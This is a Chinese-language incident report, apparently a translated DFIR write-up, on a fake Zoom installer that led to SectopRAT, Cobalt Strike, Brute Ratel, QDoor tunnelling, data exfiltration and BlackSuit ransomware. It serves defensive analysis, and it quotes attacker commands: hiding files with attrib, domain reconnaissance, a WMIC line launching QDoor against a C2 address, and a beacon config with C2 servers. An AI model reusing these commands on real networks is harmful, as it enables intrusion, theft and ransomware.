关键要点

• • 攻击者通过一个伪造的 Zoom 安装程序成功突破了网络边界，该程序利用 d3f@ckloader 和 IDAT 加载器投放 SectopRAT。
• • 经过九天的潜伏期后，SectopRAT 恶意软件释放了 Cobalt Strike 和 Brute Ratel。
• • 横向移动通过多种远程服务实现，随后利用 RDP。为便于通过 RDP 进行横向移动，攻击者使用了一款具备代理功能的恶意软件——QDoor。
• • 攻击者使用 WinRAR 将各种文件归档，然后上传至名为 Bublup 的云 SaaS 应用程序。
• • 最后，攻击者使用 PsExec 在所有 Windows 系统上部署并执行了 BlackSuit 勒索软件。

案例摘要

2024 年 5 月的这起案例始于从一个模仿远程会议应用 Zoom 的网站下载恶意文件。当用户访问该网站并下载看似用于安装 Zoom 的文件时，实际上安装的是使用 Inno Setup 创建的恶意程序。

该恶意程序是一个基于 Pascal 脚本语言的 d3f@ck loader，并通过白名单网站获取后续载荷，如 OneDrive、Telegram 和 Steam。在运行批处理脚本将载荷文件夹在 Windows Defender 扫描范围添加例外后，该程序会连接至 Steam 社区页面获取下一阶段的 IP 地址。

从该 IP 地址下载了两个归档文件，并由另一批处理脚本解压。随后，脚本继续执行每个归档中的有效载荷。其中一个归档运行了合法的 Zoom 安装程序，这样终端用户就能获得他们以为下载的程序，从而降低了用户向 IT 或安全人员报告此事件的可能性。

第二个执行的有效载荷是IDAT loader和一个加密的载荷文件，这导致 SectopRAT 被注入到 MSBuild.exe 中。MSBuild.exe 进程随后调用 Pastebin 以获取用于其C2服务器的 IP 地址。此后，C2会话建立完成，入侵活动处于静默状态。

入侵第九天，SectopRAT 开启了一个新的shell进程并执行了新的有效载荷。这次是 Brute Ratel 的有效载荷，通常被称为“Badgers”。该 Badger 在执行 Cobalt Strike 可执行信标前运行了一系列 Windows 命令进行侦察。随后，Cobalt Strike 信标被注入到 dllhost 进程中，并访问了 LSASS 内存。

此后，攻击者开始横向移动，利用 Cobalt Strike 的 psexec_psh 在域控制器上启动远程服务以部署 PowerShell Cobalt 信标。一旦进入域控制器，他们便使用 nltest、net 和 systeminfo 等工具继续进行探测活动。随后，攻击者在环境中更多主机上持续运行 Cobalt Strike 信标，重复了在域控制器上观察到的相同操作模式。

在一台域控制器和备份服务器上，攻击者放置了一个名为 svhost.exe 的二进制文件。该文件是 QDoor 代理工具。攻击者通过 WMIC 在主机上执行此文件，并传入 IP 地址以指定 QDoor 代理流量的远程服务器。利用此隧道，攻击者从其服务器代理 RDP 流量，通过域控制器连接至目标主机。

他们首先连接到文件共享服务器，使用 Edge 浏览器下载了 WinRAR。接着利用 WinRAR 将目标文件共享打包成压缩档案。最后，通过 Edge 浏览器借助 SaaS 项目管理套件 Bublup 将这些档案外传。

随后，他们通过 RDP 连接到第一台域控制器，再次使用 Edge 浏览器下载了 WinRAR，接着从临时文件共享站点 temp.sh 获取了一个 RAR 压缩包。该压缩包内含部署勒索软件所需的所有文件。

在提取存档内容后，他们开始着手部署勒索软件。他们执行了一个批处理文件，该文件利用 PsExec 通过一系列包含远程目标信息的文本文件，将勒索软件可执行文件复制到远程主机上。随后，又运行了第二个批处理脚本，同样借助这些文本文件和 PsExec 在远程主机上执行勒索软件。

勒索软件为 BlackSuit，其在远程主机上执行后，利用 vssadmin 删除卷影副本，加密本地文件，随后投放勒索信。完成远程勒索软件部署后，攻击者通过 WMIC 在用于分阶段远程部署的域控制器上本地执行该勒索软件。此案例中，从初始入侵到触发勒索的用时（TTR）略超 194 小时，跨越九个自然日。

入侵路径分析

边界突破

该案例始于用户@crep1x在 X 平台上发布的一条初始推文，内容如下：

用户访问 zoommanager[.]com 时，会看到一个克隆的 Zoom 网页，提示用户安装这款流行的远程会议工具。

点击“下载”按钮后，受害者将下载一个恶意二进制文件 Zoom_v_2.00.4.exe。

在本案例中，受害者如何抵达该页面的方式尚不明确。已知的传播手段包括恶意广告，例如在谷歌搜索“Zoom”等关键词时出现在“广告”板块的内容，或是通过访问中介设置针对流行工具的诱饵，诱骗受害者下载恶意软件。

克隆的网页仅做了轻微修改，在顶部添加了一个小功能 loadlink()，用于触发位于./download/dwnl.php 的后端 PHP 脚本。该脚本被作为点击事件添加到了部分“下载”按钮上。

攻击者并未替换所有链接，因为大多数链接仍重定向至合法的 Zoom 域名。此外，部分与“下载”相关的功能未被替换，仍指向合法的 Zoom 页面：

执行载荷

Zoom 安装程序是使用 Inno Setup（Windows 程序的免费安装程序）创建的，并用作所有恶意载荷执行的起点。

带木马的安装程序是一个下载程序，更广为人知的名称是“d3f@ckloader”，它基于 Pascal 脚本语言构建。对编译代码的字符串分析揭示了对各种 zip/cmd 文件、可执行文件和 URL 的引用。嵌入的 URL 指向各种平台，包括 OneDrive、Telegram 和 Steam。

执行时，批处理脚本21.cmd从 C：Program FilesWindows NT 目录启动。在分析时，该脚本在最初的失陷主机上不再可用，但根据类似的d3f@ckloader样本，我们评估它被配置为将“隐藏”属性设置为脚本运行目录中的所有文件夹和文件，并将根文件夹 C： 添加到 Windows Defender 的排除列表中。

在沙盒执行中观察到样本：

然后，该恶意软件建立了与 Steam 社区个人资料页面的连接，以获取第二阶段C2的 IP 地址。

Inno Download Plugin （idp.dll） 是 Inno Setup 的一个组件，用于从远程 IP 地址获取两个 ZIP 文件。与这些 Web 请求关联的 User-Agent 非常独特，使其成为通常由 NIDS（基于网络的入侵检测系统）签名识别的有用检测特征。

在此之后，执行名为 4554.cmd 的批处理脚本。它被配置为提取 C：Program FilesWindows NT 目录中两个 zip 文件的内容，并运行存储在这些存档中的两个可执行文件。

第一个存档包含可执行1522.exe，代表一个良性的 Zoom 安装程序，可能用于掩盖恶意活动并维护用户信任。第二个存档中存放了一组文件，包括一个签名的可执行152.exe、包含 HijackLoader（又名 IDAT 加载程序）及其加密恶意Payload文件 artillery.mdb 的各种 DLL 文件。

152.exe 的执行流程类似于 Rapid7 记录的先前报告的实例，其中类似的链生成一个 cmd.exe 实例，并最终解密、加载并将 SectopRAT 恶意Payload注入 MSBuild.exe 进程。

然后，这个注入的 MSBuild.exe 进程联系了 pastebin 以获取其 C2 配置。

执行图：

Brute Ratel

在入侵的第九天，我们观察到 SectopRAT 进程生成了一个新的命令 shell，并使用 regsvr32.exe 执行 DLL 2905.dll。

YARA 基于规则的内存扫描揭示了加载进程中与 Brute Ratel C4 框架一致的二进制模式。

在将 2905.dll 文件放到磁盘前一分钟，另一个 DLL 3004.dll 也被放下。这个 DLL 也是一个 Brute Ratel Badger，但具有不同的 C2 配置，并且在入侵期间从未执行过。目前尚不清楚这是攻击者的疏忽还是意外放弃。

Cobalt Strike

观察到相同的 DLL 促进了驻留在 Windows 临时目录中的 Cobalt Strike 信标 run32.exe 的执行。

内存扫描确认此可执行文件是具有多个不同 YARA 规则命中的钴打击信标。

权限维持

执行152.exe后，Hijackloader 通过创建一个启动条目在最初的失陷主机上建立了持久性：

防御规避

Cobalt Strike 信标有效载荷已成功注入 dllhost.exe 进程，如下面屏幕截图中的 Sysmon 事件 ID 10 所示。

在初始加载程序执行期间，攻击者使用以下命令使用 Windows attrib 实用程序更改属性：

attrib  +s +h /D "C:Program FilesWindows NT*.*"

提供的命令标志执行以下作：

• • +s 设置系统文件属性。如果文件使用此属性集，则必须先清除该属性，然后才能更改文件的任何其他属性。
• • +h 设置 Hidden file 属性。如果文件使用此属性集，则必须先清除该属性，然后才能更改文件的任何其他属性。
• • /D 将 attrib 和任何命令行选项应用于目录。

这将隐藏初始访问加载程序文件，使其在通过 Explorer 浏览时不可见，从而降低被发现的机会。

在入侵期间，攻击者将 SectopRAT 拖放到 %USERPROFILE%AppDataLocalTemp 中的磁盘。

然后使用 MSbuild.exe 在内存中加载和执行此文件。确认链接时，为磁盘文件和进程内存MSbuild.exe触发相同的 YARA 规则。

然后观察到 MSbuild 进程被用于 SectopRAT C2 通信，将在命令和控制部分进一步介绍。

凭证访问

入侵的证据表明，Cobalt Strike 传递哈希模块被利用，导致 dllhost.exe 生成一个新的 cmd.exe 进程，这表明成功尝试将权限提升到本地“SYSTEM”。

随后，dllhost.exe 进程启动了对 LSASS 进程的访问请求，该进程具有特定权限掩码 0x1FFFFF （PROCESS_ALL_ACCESS）。此访问请求模式指示尝试从 LSASS 进程内存空间执行凭证转储。

指示此行为的是 CallTrace 中的 0x1FFFFF Granted 访问权限（完全进程访问权限）和 UNKNOWN：

CallStackTrace 显示多个偏移量，包括 'UNKNOWN'

此活动的其他证据包括使用 Logon 类型 9 以及 seclogo 的身份验证类型强烈表明凭据使用，类似于 Runas 命令的 /netonly 方法，如 Cobalt Strike 的“传递哈希”技术所使用的那样。

Rubeus

在入侵期间，攻击者似乎试图使用 Rubeus 进行凭据访问，这是基于从最初的失陷主机捕获的内存捕获中该工具的 YARA 命中率。它是在 Brute Ratel Badger 的进程内存空间中发现的。该工具可以执行各种凭证访问技术，我们无法识别任何特定的调用，表明在这次入侵期间尝试的方法。

信息收集

攻击者最初在 30 分钟的时间范围内运行主机名，然后运行以下命令。值得注意的是，其中一些命令之间存在相当大的时间差：

11:56 nltest /domain_trusts /all_trusts 11:58 net group ""domain admins"" /domain 00:07 net group ""Domain Computers"" /domain 00:15 net group /domain 00:18 systeminfo 00:21 whoami /groups

在此之后，攻击者决定放弃一项新的访问功能，即 Cobalt Strike 信标。这个信标继续进行后续的侦察命令：

net group "domain admins" /domain

在访问环境中的某个域控制器后不久，攻击者快速连续执行了以下命令：

net group "domain admins" /domainnltest /dclist:<DOMAINNAME>.local

几乎同时，攻击者迁移到环境中的备份服务器，执行相同的删除服务并部署 Cobalt Strike。紧接着是执行命令，通过 WMIC 收集已安装的 AV/EDR 产品。

WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

虽然 WMIC 自 W10 21H1 起已弃用，但它仍经常用于多个管理任务或被攻击者使用。

移动到环境中的多台机器上，放置 Cobalt Strike Beacons，角色执行了以下发现命令：

net user <PRIV_USER> /domain ping <workstation1> ping <workstation2> net view //<IP1>/ net view \<IP1>        Note:now with correct '' nltest /domain_trusts /all_trusts net view \<IP2> net view \<IP3> net view \<IP4> net view \<IP5> net view \<IP6> nltest /dclist:<DOMAIN> ping <DOMAIN> nltest /FINDUSER:REDACTED

横向移动

远程服务

攻击者横向移动的主要方法是使用 Cobalt Strike 的跳psexec_psh功能。通过使用这种技术，他们通过 PowerShell 和 base64 编码的恶意Payload在多个主机上快速连续地安装了 Cobalt Strike。

通过使用 Zeek，我们可以观察通过 RPC 完成的所有调用，以创建和执行此服务。

Cyb3rSn0rlax 创建了一个非常好的资源来了解如何检测这些类型的技术

利用 Cyberchef（我们之前报告中描述的方法），我们可以解码 shellcode。

RDP

使用 QDoor 中的代理功能，他们使用 RDP 访问文件服务器和域控制器。这可以在事件 ID 4624 LogonType 10 日志中观察到：

由于 QDoor 的 C2 通信未加密，因此可以使用 Suricata 发现这种行为。

在执行这些 RDP作时，攻击者通过各种日志事件泄露了他们的后端主机名：

Workstation Name:DESKTOP-NT7KVK5

事件 ID 4779：

事件 ID 4624 LogonType 3：

敏感资产数据收集

在通过 RDP 会话的文件服务器上，他们使用 Edge 浏览器下载 WinRAR，并使用它来开始将文件共享数据压缩到存档中。在这里，我们使用 Dissect 的 Edge 浏览器插件来提取通过 KAPE 收集的数据。

$ target-query <REDACTED> -f edge.downloads | rdump -f '{browser} downloaded {path} from {url} {size} via {tab_referrer_url}'edge downloaded C:Users<REDACTED>Downloadswinrar-x64-701.exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-701.exe 3.77 MB via https://www.bing.com/edge downloaded C:Users<REDACTED>Downloadswinrar-x64-701 (1).exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/winrar-x64-701.exe 3.77 MB via https://www.bing.com/

然后，他们使用以下命令执行 WinRAR 来压缩文件共享文件夹。

"C:Program FilesWinRARWinRAR.exe" a -ep1  -scul -r0 -iext   -imon1 -- . G:REDACTED

远程控制

在这种情况下，使用了四个独立的命令和控制通道，即 SectopRAT、Brute Ratel、QDoor 和 Cobalt Strike。攻击者使用所有这些框架进出受害者的环境。

SectopRAT

在 SectopRAT 将自身注入 45.141.87 的 MSBuild.exe 进程后，在流量上触发了以下规则[.]218.

ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init

当观察到到目标端口 15647 的流量时，将触发此规则：

MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)

此规则在目标端口 9000 的 C2 信标活动期间触发，如下所示：

Brute Ratel Badger

5.181.159[.]31 个，关联的域 megupdate.com

在查找此活动时，以下规则与此 IP 相关联：

ET INFO 观察到的 ZeroSSL SSL/TLS 证书

对于此 Badger （2905.dll），提取了以下配置：

在环境中找到另一个示例 （3004.dll），其中包含不同的已配置 C2：

Cobalt Strike Beacon

信标具有以下配置（已修剪）：

{    "CobaltStrikeBeacon": {        "BeaconType": "HTTPS"        "Port": 443        "C2Server": [ "provincial-gaiters-gw.aws-use1.cloud-ara[.]tyk.io,/api/v2/login"],        "HttpPostUri": ["/api/v2/status"],        "Malleable_C2_Instructions": [            [ "Remove 1522 bytes from the end",                "Remove 84 bytes from the beginning",                "Remove 3931 bytes from the beginning",                "Base64 URL-safe decode",                "XOR mask w/ random key"]        "Spawnto_x86": ["%windir%\syswow64\dllhost.exe"],        "Spawnto_x64": ["%windir%\sysnative\dllhost.exe"],        "Watermark": [987654321]        "bProcInject_MinAllocSize": [17500],        "ProcInject_PrependAppend_x86": [["9090",""]],        "ProcInject_Execute": [            ["ntdll:RtlUserThreadStart",                "CreateThread",                "NtQueueApcThread-s",                "CreateRemoteThread",                "RtlCreateUserThread"]}

这很有趣，因为它与第二个 Badger 匹配，后者被配置为使用 tyk[.]io 域，但没有显示执行痕迹。Tyk是适用于 REST、GraphQL、gRPC 和异步 API 的开源通用 API 管理工具，可实现快速 API 设置和访问。这种活动正变得越来越普遍，因为这使得攻击者能够利用合法的基础设施进行恶意活动。一个例子，显示 Cobalt Strike 的使用情况，是 Askar 在 shells.systems 上撰写的 2022 年博客，显示了与此活动中完全相同的 uri。

目前尚不清楚为什么攻击者决定在横向移动期间继续使用 Cobalt Strike 而不是 Brute Ratel，尤其是在未执行的 Badger 包含类似的 Tyk C2 结构域的情况下。

QDoor

在这次入侵期间，我们观察到攻击者使用的代理。这个代理原来是一个名为 QDoor 的工具，已在涉及 BlackSuit 勒索软件的其他多个案例中出现。ConnectWise 已经写过它，其中更详细地解释了它的功能：

https://www.linkedin.com/pulse/qdoor-new-backdoor-tool-blacksuits-arsenal-connectwise-uwvhc

该文件具有二进制 88.119.167 的硬编码 C2[.]239. 这可以在文件的字符串中观察到。

QDoor 也可以通过命令行参数运行，通过传递 C2 配置的地址，在此入侵中就是这种情况：

%WINDIR%system32cmd.exe /C wmic /node:"REDACTED" process call create "%WINDIR%Tempsvhost.exe "143.244.146[.]183""

此活动触发了以下 ET 规则，指示 QDoor 促进的已建立代理上的隧道 RDP 会话：

ET POLICY Tunneled RDP msts Handshake

数据外带

按照 Collection 部分所述创建 RAR 存档后，攻击者开始泄露这些数据。使用 Edge，他们开始 mystuff.bublup.com。Bublup 是一个 SASS 项目管理套件，包括基于云的存储。

Bublup 使用 Amazon S3 作为其存储后端。

然后，攻击者继续将 rar 档案上传到云存储服务。

总共有 934.38 MB 被传输到云存储服务

目标达成

在第 9 天快结束时，攻击者通过下载一组传播勒索软件所需的文件来为勒索软件部署做准备。文件存档实用程序 WinRar 7.0.1 是使用 Microsoft Edge 下载的，并安装在其中一个域控制器上。

Edge 历史记录文件 C：Users<redacted>AppDataLocalMicrosoftEdgeUser DataDefaultHistory 包含以下条目：

https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-701.exe (C:UsersREDACTEDDownloadswinrar-x64-701.exe). State: Complete. Received 3948120 of 3948120 bytes. Interrupt Reason: No Interrupt - Success. Danger Type: Content May Be Malicious - (eg: extension is exe but Safe Browsing has not finished checking the content).

WinRAR 用于解压缩从临时存储网站 temp.sh 获取的存档。

RAR 存档的内容被提取到本地用户的 Downloads 目录中。

RAR 存档包含以下文件：

• • 123.exe
• • PsExec.exe
• • comps[1-4].txt
• • COPY.bat
• • EXE.bat

攻击者创建了一个网络共享来暂存文件并促进部署过程：

然后执行批处理脚本COPY.BAT，并使用 PsExec 将名为 123.exe 的 BlackSuit 勒索软件恶意Payload分发到多个远程主机。文件 comps[1-4].txt – 表示包含受害者网络上主机的私有 IP 地址的目标列表。

执行 RAR 存档中包含的第二个批处理脚本EXE.bat以使用 PsExec 在指定的远程主机上启动加密过程。

勒索软件通过尝试删除所有卷影副本 （VSS） 来针对数据恢复机制。

最后，攻击者在其暂存域控制器上使用 WMIC，最后一次执行勒索软件。

加密后，所有受影响的系统上都显示了以下赎金记录。

钻石模型

时间线

IoCs

Atomic

d3f@ckloaderhttp://78.47.105[.]28/manual/152/152.ziphttp://78.47.105[.]28/manual/152/1522.zipSecTopRAT45.141.87[.]218:9000Brute Ratel:megupdate[.]com:443 / 5.181.159[.]31:443administrative-manufacturer-gw.aws-usw2.cloud-ara.tyk[.]io:443Cobalt Strikeprovincial-gaiters-gw.aws-use1.cloud-ara.tyk.io:443 / 44.196.9.9:443QDoor88.119.167[.]239:443143.244.146[.]183:443

Computed

EXE.bat80110fbb81d0407340b908bb43c815d38d4f2aa315ce17505b8698db22ec2526805645a4b837bec967df6748b72c3b43c254532620977d0bbe0fc23e0c178c74516baab9COPY.batd98fb34b4fa0f83d02e3272f1cb9c5fc6c75e2c704f69aaa09cdfd455c7bdbf9336dc7fef34aad9a56ca9310f40ecbcb075e4be12aaf9ef60fd24893b5e8fb28934cd730123.exe91f69fa3439f843b51c878688963e574c5826e9e3c4b1fece4991f269fd4e5307e92bfe2ecb0b3057163cd25c989a66683cfb47c19f122407cbbb49b1043e908c4f07ad1PsExec.exe27304b246c7d5b4e149124d5f93c5b01e50d9e3bd91908e13a26b3e23edeaf577fb3a0953337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7efsvhost.exe85144918f213e38993383f0745d7e41ea6dcdfc8e97616c07549290950e78b145883e532e6cfae572f777def856878e36bbacfaa82cb5662fc97c1492e2367a105dddbc9artillery.mdbffb3755897b8d38ccc70b9c3baa38960a25cfdcff675277035fb35add9d273934117e943b594b8b91b6967e2fa6946753c8fd3f6ed3592c55c49a0ada7abd41752ae8a41UIxMarketPlugin.dlld1ba9412e78bfc98074c5d724a1a87d60572f98d78fb0b366b5a086c2a74cc68b771d368cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15relay.dll9bddb0e95a03fdcea4c62210f58181843eb042e449c6097f29fad255d21aac336fae534bcb53118ec2d578febfd311bcda298c716f1f543b24f780f2721f45df0bda3dc3article.dat4b22032954a12677675add0de20d7b945b1e0d72435da7d3a97107cddc655be71769ba53a8a88bf91d1280ffa59536a6e50f24fe9c1ef79f68a300ef047d92eec7231d9e152.exe9fb4770ced09aae3b437c1c6eb6d7334fe54b31b0db8665aa5b22bed147e8295afc88a03a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d32905.dll8477ef317b8974e18ed84ca69b9f6a08328d5554025757e5ec8e2e9eee2ad97d0e986a59b676dbc3e20fa7acb92c1cc0a90132798c482dbf43211793abb937bd43295d42run32.exeeae6cd02784743cde314afb8c533c5cda13061b229a225441f67d2b25ccda139ee21b14e58dde623e36fefe8038aa2d579d3d1f5394b96ea3623b3125876137b4ee08d80Zoom_v_2.00.4.exec0230d748e61819d9dfad0da03fe6ec8951154980d3ddd4101b8e09b11669cbedc86f9793967b38f763b2e58b0679bc0178247b855c68d761187c71c2f1760b6882e473a3004.dllf91fbe09b593fb1104b30e3343afb39241360d3eae3a71dd60c9ac34788d6863ef4e3e3063dcff4bad9576794c3a412cf8dae83b807a138cc09c4de64485bb8ec991cd4b1522.exe5b8ebe43ded7ba460e4827206329375adf774b96aa6f7ba914e7d6c1e3c448170e2e419ee0f31fe28223b5bd22ce01c6bc1d3a4d3e030b9dc3c98440d11d72e67fdaa453

Detections

Network

ETPRO ADWARE_PUP InnoDownloadPlugin User-Agent ObservedET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)ET INFO Observed ZeroSSL SSL/TLS CertificateET POLICY Tunneled RDP msts HandshakeET RPC DCERPC SVCCTL - Remote Service Control Manager AccessET POLICY PsExec service created

Sigma

DFIR Private Rules:

e6be809d-adfd-473b-b1f5-4a3cc5938df1 - Suspicious RAR Archive Download From temp.sh  b8a5dde0-fb1c-466e-832e-5a9b33e59b69 - Suspicious Temp File Lookup for Steam User Profile  78e4aeff-80ce-4b86-9664-2f0313e960e3 - Potential DLL Side Loading Abuse of IKARUS Security GuardX  476d0227-967d-4429-bc02-abe0985275e2 - Potential SectopRAT MSBuild Network communication  c475246c-133b-454e-9b9f-963139b4af1a - Adding Hidden Attribute Flag via Command line to Directory  c79b4806-b86f-4c6e-a7b8-ecdb4b73fb70 - Detect AV/EDR Solutions Enumeration via WMIC  6df37102-c993-4133-ad3d-b12ca32e03c6 - Detect Process Creation via WMIC with Remote Node

Sigma Repo:

2aa0a6b4-a865-495b-ab51-c28249537b75 - Startup Folder File Write36e037c4-c228-4866-b6a3-48eb292b9955 - DNS Query Request By Regsvr32.EXE526be59f-a573-4eea-b5f7-f0973207634d - New Process Created Via Wmic.EXE5cc90652-4cbd-4241-aa3b-4b462fa5a248 - Potential Recon Activity Via Nltest.EXEe568650b-5dcd-4658-8f34-ded0b1e13992 - Potential Product Class Reconnaissance Via Wmic.EXEd95de845-b83c-4a9a-8a6a-4fc802ebf6c0 - Suspicious Group And Account Reconnaissance Activity Using Net.EXE0ef56343-059e-4cb6-adc1-4c3c967c5e46 - Suspicious Execution of Systeminfo62510e69-616b-4078-b371-847da438cc03 - Share And Session Enumeration Using Net.EXEd7a95147-145f-4678-b85d-d1ff4a3bb3f6 - CobaltStrike Service Installations - Securitybd8b828d-0dca-48e1-8a63-8a58ecf2644f - Group Membership Reconnaissance Via Whoami.EXEfa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - PsExec Tool Executionc947b146-0abc-4c87-9c64-b17e9d7274a2 - Shadow Copies Deletion Using Operating Systems Utilities15619216-e993-4721-b590-4c520615a67d - Potential Meterpreter/CobaltStrike Activity

Yara

External rules:

• • https://www.linkedin.com/pulse/qdoor-new-backdoor-tool-blacksuits-arsenal-connectwise-uwvhc/

From Yaraforge :

AVASTTI_Cobaltstrike_Payload_EncodedAVASTTI_Cobaltstrike_Raw_Payload_Smb_Stager_X86CAPE_BruteratelCAPE_BruteratelconfigCAPE_BruteratelsyscallCAPE_CobaltstrikestagerCobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_xCobaltStrike_Resources_Smbstager_Bin_v2_5_through_v4_xCobaltStrike_Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13CobaltStrike_Sleep_Decoder_IndicatorCobaltbaltstrike_Payload_EncodedCobaltbaltstrike_RAW_Payload_smb_stager_x86DITEKSHEN_MALWARE_Win_Arechclient2ELASTIC_Windows_Generic_Threat_2Ae9B09EELASTIC_Windows_Hacktool_Rubeus_43F18623ELASTIC_Windows_Shellcode_Generic_8C487E57ELASTIC_Windows_Trojan_Bruteratel_5B12CbabELASTIC_Windows_Trojan_Cobaltstrike_663Fc95DELASTIC_Windows_Trojan_Cobaltstrike_8D5963A2ELASTIC_Windows_Trojan_Cobaltstrike_B54B94AcELASTIC_Windows_Trojan_Metasploit_38B8CeecELASTIC_Windows_Trojan_Redlinestealer_15Ee6903EMBEERESEARCH_Win_Cobalt_Sleep_EncryptGCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_XGCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_XGCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13HKTL_CobaltStrike_Beacon_4_2_DecryptHKTL_CobaltStrike_SleepMask_Jul22Msfpayloads_msf_refSECUINFRA_SUSP_Powershell_Base64_DecodeSIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_IndicatorSIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_DecryptSIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22SIGNATURE_BASE_Msfpayloads_Msf_RefSIGNATURE_BASE_SUSP_Fake_AMSI_DLL_Jun23_1SIGNATURE_BASE_SUSP_PS1_Frombase64String_Content_IndicatorSIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1SIGNATURE_BASE_SUSP_Scheduled_Task_BigsizeSIGNATURE_BASE_Wiltedtulip_WindowstaskSUSP_PS1_FromBase64String_Content_IndicatorSUSP_PS1_JAB_Pattern_Jun22_1SUSP_XORed_URL_In_EXEWiltedTulip_WindowsTaskWindows_Trojan_BruteRatel_5b12cbab

MITRE ATT&CK

Access Token Manipulation - T1134                                                                                                                                                                           Archive via Utility - T1560.001                                                                                                                                                                             Data Encrypted for Impact - T1486                                                                                                                                                                           Dead Drop Resolver - T1102.001                                                                                                                                                                              Domain Groups - T1069.002                                                                                                                                                                                   Domain Trust Discovery - T1482                                                                                                                                                                              Drive-by Compromise - T1189                                                                                                                                                                                 Exfiltration to Cloud Storage - T1567.002                                                                                                                                                                   Hidden Files and Directories - T1564.001                                                                                                                                                                    Ingress Tool Transfer - T1105                                                                                                                                                                               Inhibit System Recovery - T1490                                                                                                                                                                             Lateral Tool Transfer - T1570                                                                                                                                                                               Local Account - T1087.001                                                                                                                                                                                   Local Groups - T1069.001                                                                                                                                                                                    LSASS Memory - T1003.001                                                                                                                                                                                    Malicious File - T1204.002                                                                                                                                                                                  MSBuild - T1127.001                                                                                                                                                                                         Network Share Discovery - T1135                                                                                                                                                                             PowerShell - T1059.001                                                                                                                                                                                      Protocol Tunneling - T1572Registry Run Keys / Startup Folder - T1547.001Regsvr32 - T1218.010Remote Desktop Protocol - T1021.001Remote System Discovery - T1018SectopRATSecurity Software Discovery - T1518.001Service Execution - T1569.002SMB/Windows Admin Shares - T1021.002System Information Discovery - T1082System Owner/User Discovery - T1033Web Protocols - T1071.001Windows Command Shell - T1059.003Windows Management Instrumentation - T1047